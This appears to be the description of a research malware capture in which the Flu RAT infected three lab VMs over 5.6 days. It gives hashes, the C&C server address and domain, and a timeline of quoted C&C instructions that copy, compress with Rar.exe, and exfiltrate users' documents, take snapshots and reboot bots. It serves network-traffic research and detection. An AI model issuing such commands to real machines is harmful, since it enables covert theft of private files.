Description

Name: Flu Malware
- Flu is a real RAT malware that was developed without the intention of abusing it. The Flu project group created a read and completely functional RAT with the aim of learning and testing ideas. It is free to downloadd.
The infection was done on three home computers with our own configured version of flu malware with an online C&C.
The three computers were VirtualBox running Window 7 tiny.
The VMs were configured to use a Squid proxy (version 2.7 and 3.3.7) in other Linux VM to communicate with internet.
We set up our own C&C server in openshift.com (PHP+MySQL+PHPMyAdmin)
The custom binary used was:
- flufollower-bot.exe (flufollower-0.5.2a)
  - MD5: 0858d8f8b06af40c9738003044a8cf0e
  - SHA1: 044ae35e7e00de1f4ffaeee54c2943047bfacb13
  - SHA256: 5497fa425b006a8ec368f273159ed060c50fae4bf4cdb5a70cf3fdf51e7e01f9
Duration: 5.6 days
Addresses Used in the capture:
- C&C server in openshift
  - 54.242.92.108, port 80. Domain: twit-myconnection.rhcloud.com
- Bot 1
  - 10.0.0.151
- Bot 2
  - 10.0.0.152
- Bot 3
  - 10.0.0.153
- Proxy Server
  - 10.0.0.150
VirusTotal
HybridAnalysis
RobotHash

About the configuration of Flu

Pooling of 10 seconds
Stealth control behavior: commands every 30mins and 8 hours
HTTP C&C through a proxy
Behavior of the attacks: search files, compress them, exfiltrate
Data sent using the C&C channel.
The flu malware was configured to our needs.

Topology

3 VirtualBox Windows 7, bridged and configured with a proxy on Windows
The squid proxy is running in another VM. Squid 2.7 first and 3.3.7 later on Linux. (first version didn't worked well)
The malware communicates through the proxy to the C&C on openshift.com, where we used a PHP webserver, a MySQL database and PHPMyAdmin for administration.

Management traffic

We did several SSH connections to openshift for management purposes. They are not part of the infection.

Timeline (Unfortunately the timeline here is not comprehensive. For a comprehensive list of commands and times see the file timeline.of.commands.txt)

Mon, 08 Jul 2013 23:00:00 GMT

Start of the capture - During the first day, we only did the infection and the C&C connections.

Tue, 9 July 2013, 18:32:51

Changed the proxy to squid/3.3.7, because the other one was not allowing us to exfiltrate

Wed, 10 Jul 2013 01:26:05 GMT

Command 30958 sent.

Wed, 10 Jul 2013 12:28:23 GMT

Some copy of documents to a local folder

<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>

Wed, 10 Jul 2013 15:14:17 GMT

Compression of documents

<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>

Wed, 10 Jul 2013 16:35:20 GMT

Exfiltration of documents

<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>

Wed, 10 Jul 2013 23:26:41 GMT

Fri, 12 Jul 2013 22:27:22 GMT

Command 27269 sent.

<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>

Wed, 10 Jul 2013 23:31:11 GMT

Command to compress documents

<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>

Wed, 10 Jul 2013 23:41:01 GMT

Exfiltraion of documents

<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>

Thu, 11 Jul 2013 10:42:08 GMT

Command to shutdown one bot

<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>

Thu, 11 Jul 2013 13:03:41 GMT

Command to shutdown other bot

<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>

Thu, 11 Jul 2013 13:07:55 GMT

Command to list files in all bots

<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>

Sun, 14 Jul 2013 13:28:43 GMT

Capture finished